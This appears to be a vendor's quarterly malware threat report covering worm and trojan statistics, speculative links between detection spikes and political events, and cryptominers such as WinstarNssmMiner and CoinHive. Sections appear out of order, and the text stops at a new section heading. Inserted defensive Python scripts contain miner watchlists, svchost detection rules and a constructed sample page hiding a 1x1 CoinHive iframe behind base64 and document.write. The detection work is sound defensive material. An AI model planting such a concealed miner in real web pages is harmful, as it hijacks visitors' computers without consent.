This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda, and over 300 more.
The bubble chart shows that in Q2 2018, Russia (ru), Turkey (tr), and India (in) were the countries with the highest number of worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.
In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany, and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018 Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images and videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place at the same time as annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions

In Q2 Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
The malicious code in the registry
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.

Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.
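One way to find such processes without crashing the host, as an added example that is not the report's own code: it reads the parent and the "critical process" flag (ProcessBreakOnTermination via NtQueryInformationProcess, the API behind that attribute) of every svchost.exe and refuses to recommend termination where the flag is set. It assumes that no legitimate svchost.exe carries the flag; the live collector runs only on Windows and the inventory shown is constructed.

```python
"""Triage svchost.exe instances for the critical-flag trick (added example, not report code)."""
import ctypes
import sys
from dataclasses import dataclass

EXPECTED_PARENT = "services.exe"           # legitimate svchost.exe is spawned by services.exe
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_BREAK_ON_TERMINATION = 29           # PROCESSINFOCLASS behind the "critical process" flag
TH32CS_SNAPPROCESS = 0x2


@dataclass
class Proc:
    pid: int
    name: str
    parent_name: str
    critical: bool   # BreakOnTermination set: killing it blue-screens the host


def triage(proc):
    """Return (verdict, advice). Assumption: no legitimate svchost.exe carries the critical flag."""
    if proc.name.lower() != "svchost.exe":
        return "ignore", "not svchost.exe"
    if proc.critical:
        return "suspect", ("critical flag set; do not terminate (BSOD): remove the persistence "
                           "mechanism, reboot, then scan the disk image offline")
    if proc.parent_name.lower() != EXPECTED_PARENT:
        return "review", f"unexpected parent {proc.parent_name}; collect the image for analysis"
    return "ok", "spawned by services.exe, no critical flag"


def triage_all(procs):
    """Map pid -> verdict for a whole inventory."""
    return {p.pid: triage(p)[0] for p in procs}


def collect_windows():
    """Build the inventory on a live Windows host via Toolhelp + NtQueryInformationProcess."""
    if sys.platform != "win32":
        return []
    from ctypes import wintypes
    k32, ntdll = ctypes.windll.kernel32, ctypes.windll.ntdll

    class PROCESSENTRY32W(ctypes.Structure):
        _fields_ = [("dwSize", wintypes.DWORD), ("cntUsage", wintypes.DWORD),
                    ("th32ProcessID", wintypes.DWORD), ("th32DefaultHeapID", ctypes.c_size_t),
                    ("th32ModuleID", wintypes.DWORD), ("cntThreads", wintypes.DWORD),
                    ("th32ParentProcessID", wintypes.DWORD), ("pcPriClassBase", wintypes.LONG),
                    ("dwFlags", wintypes.DWORD), ("szExeFile", wintypes.WCHAR * 260)]

    k32.CreateToolhelp32Snapshot.restype = wintypes.HANDLE
    k32.OpenProcess.restype = wintypes.HANDLE
    k32.Process32FirstW.argtypes = [wintypes.HANDLE, ctypes.POINTER(PROCESSENTRY32W)]
    k32.Process32NextW.argtypes = [wintypes.HANDLE, ctypes.POINTER(PROCESSENTRY32W)]
    k32.CloseHandle.argtypes = [wintypes.HANDLE]
    ntdll.NtQueryInformationProcess.argtypes = [wintypes.HANDLE, ctypes.c_int,
                                                ctypes.POINTER(wintypes.ULONG),
                                                wintypes.ULONG, ctypes.c_void_p]
    snap = k32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
    entry = PROCESSENTRY32W()
    entry.dwSize = ctypes.sizeof(entry)
    rows = []
    more = k32.Process32FirstW(snap, ctypes.byref(entry))
    while more:
        rows.append((entry.th32ProcessID, entry.th32ParentProcessID, entry.szExeFile))
        more = k32.Process32NextW(snap, ctypes.byref(entry))
    k32.CloseHandle(snap)
    names = {pid: name for pid, _, name in rows}   # caveat: a dead parent's PID may be reused
    inventory = []
    for pid, ppid, name in rows:
        if name.lower() != "svchost.exe":
            continue
        critical = False
        handle = k32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
        if handle:   # protected processes may refuse the open; treated as not flagged
            flag = wintypes.ULONG(0)
            status = ntdll.NtQueryInformationProcess(handle, PROCESS_BREAK_ON_TERMINATION,
                                                     ctypes.byref(flag), ctypes.sizeof(flag), None)
            critical = status == 0 and flag.value == 1
            k32.CloseHandle(handle)
        inventory.append(Proc(pid, name, names.get(ppid, "<unknown>"), critical))
    return inventory


# Constructed inventory mirroring the report: two injected svchost.exe, both flagged critical.
SAMPLE_INVENTORY = [
    Proc(900, "svchost.exe", "services.exe", False),
    Proc(3124, "svchost.exe", "services.exe", True),   # miner
    Proc(3140, "svchost.exe", "services.exe", True),   # antivirus hunter
    Proc(3200, "svchost.exe", "explorer.exe", False),  # wrong parent, no flag
    Proc(4000, "notepad.exe", "explorer.exe", False),
]

if __name__ == "__main__":
    for p in collect_windows() or SAMPLE_INVENTORY:
        print(p.pid, p.name, *triage(p))
```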
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out against other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature will terminate its processes.

CoinMiner kills its rivals as follows.

The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
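The two miners above leave a footprint an analyst can look for in a process snapshot: a process named like the one CoinMiner tests for (AMDDriver64), a system process such as svchost.exe burning CPU because of an injected miner thread (WinstarNssmMiner), or an svchost.exe that was not started by services.exe or does not live in System32. The triage script below is an added example written for this report, not Comodo's code or the malware's own script; the host snapshot it runs on is constructed, and every watchlist entry other than AMDDriver64 is an assumption. It only reports, because WinstarNssmMiner marks its host processes critical and killing them blue-screens the machine.

```python
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    path: str
    cpu_percent: float  # sustained CPU share sampled by the collector


# AMDDriver64 is the process name CoinMiner tests for, per the report;
# the rest of the watchlist is an assumption of this example.
MINER_WATCHLIST = {"amddriver64", "amddriver64.exe"}
SYSTEM32_PREFIX = "c:\\windows\\system32\\"

# Constructed host snapshot for the demonstration (not data from the report):
# a legitimate svchost.exe, a legitimate svchost.exe hosting an injected miner
# thread (high CPU), a fake svchost.exe outside System32 with an unknown
# parent, and a process named like CoinMiner's.
SNAPSHOT = [
    Proc(4, 0, "System", "", 0.5),
    Proc(600, 4, "services.exe", "C:\\Windows\\System32\\services.exe", 0.1),
    Proc(900, 600, "svchost.exe", "C:\\Windows\\System32\\svchost.exe", 1.0),
    Proc(1200, 600, "svchost.exe", "C:\\Windows\\System32\\svchost.exe", 97.0),
    Proc(3100, 2200, "svchost.exe", "C:\\Users\\Public\\svchost.exe", 2.0),
    Proc(4400, 2200, "AMDDriver64.exe", "C:\\ProgramData\\AMDDriver64.exe", 88.0),
]


def triage(snapshot, cpu_threshold=80.0):
    """Return [(pid, name, [reasons])] for processes worth an analyst's look.

    The function never terminates anything: as the report notes for
    WinstarNssmMiner, a miner may mark its host process critical so that
    killing it crashes the machine. Isolate the host and capture memory first.
    """
    by_pid = {p.pid: p for p in snapshot}
    findings = []
    for p in snapshot:
        reasons = []
        lname = p.name.lower()
        if lname == "svchost.exe":
            parent = by_pid.get(p.ppid)
            if parent is None or parent.name.lower() != "services.exe":
                reasons.append("svchost.exe not started by services.exe")
            if not p.path.lower().startswith(SYSTEM32_PREFIX):
                reasons.append("svchost.exe image outside System32")
            if p.cpu_percent >= cpu_threshold:
                reasons.append("sustained high CPU in a system process (possible injected miner)")
        if lname in MINER_WATCHLIST:
            reasons.append("process name on miner watchlist")
        if reasons:
            findings.append((p.pid, p.name, reasons))
    return findings


if __name__ == "__main__":
    for pid, name, reasons in triage(SNAPSHOT):
        print(pid, name, "; ".join(reasons))
```

On a live host the snapshot would come from the OS (Get-Process with parent and path information, or a sysmon export); the rules stay the same. The CPU rule is the one that catches a miner injected into a genuine, correctly parented svchost.exe, which is why it is applied even when path and parent look normal.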
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide; CoinHive is the brightest example.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its snippet of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.

As a result, the malicious code on a webpage looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe.

The iframe loads the URL shortener

The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we find the familiar link to CoinHive.

The link to CoinHive

What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
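A page check that stops at grepping for the CoinHive script misses this variant; what survives the obfuscation is the 1x1 iframe and the short-link host it points at, even when the iframe is only present as a base64 string that a script decodes at load time. The scanner below is an added example written for this report, not Comodo's or CoinHive's code. It decodes every base64-looking blob in a page, parses both the page and the decoded fragments for iframes, and flags tiny or hidden frames and frames pointing at a flagged host. The sample page is constructed; cnhv.co is the short-link domain the report shows, and the other host in the list is an assumption.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# cnhv.co is the CoinHive short-link domain from the report; coinhive.com is
# added as an assumption for illustration.
SUSPICIOUS_HOSTS = {"cnhv.co", "coinhive.com"}

# Constructed sample page: the hidden iframe is base64-encoded and written
# with document.write(atob(...)), the style of obfuscation the report shows.
HIDDEN_IFRAME = ('<iframe src="https://cnhv.co/EXAMPLE" width="1" height="1" '
                 'style="display:none"></iframe>')
SAMPLE_PAGE = (
    "<html><body><h1>Welcome</h1>\n"
    "<script>document.write(atob('"
    + base64.b64encode(HIDDEN_IFRAME.encode()).decode()
    + "'));</script>\n"
    "<p>nothing to see here</p></body></html>"
)


class _IframeCollector(HTMLParser):
    """Collect the attributes of every iframe tag in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append(dict(attrs))


def _candidate_payloads(html):
    """Yield the page itself plus every base64 blob that decodes to markup."""
    yield html
    for blob in re.findall(r"[A-Za-z0-9+/]{24,}={0,2}", html):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError: not base64 after all
            continue
        if "<" in decoded:
            yield decoded


def scan_for_hidden_miners(html):
    """Return one finding per iframe that is tiny, hidden, or points at a flagged host."""
    findings = []
    for payload in _candidate_payloads(html):
        collector = _IframeCollector()
        collector.feed(payload)
        for frame in collector.frames:
            src = frame.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            tiny = frame.get("width") == "1" and frame.get("height") == "1"
            hidden = "display:none" in frame.get("style", "").replace(" ", "")
            flagged_host = host in SUSPICIOUS_HOSTS
            if tiny or hidden or flagged_host:
                findings.append({
                    "src": src, "host": host, "tiny": tiny, "hidden": hidden,
                    "flagged_host": flagged_host,
                    "encoded": payload is not html,  # found only after decoding
                })
    return findings


if __name__ == "__main__":
    for finding in scan_for_hidden_miners(SAMPLE_PAGE):
        print(finding)
```

The scanner works on the served HTML only; a script that assembles the URL at run time from pieces would need a headless browser that records the iframes actually created in the DOM. Even then, the size and host checks are the same.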
The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

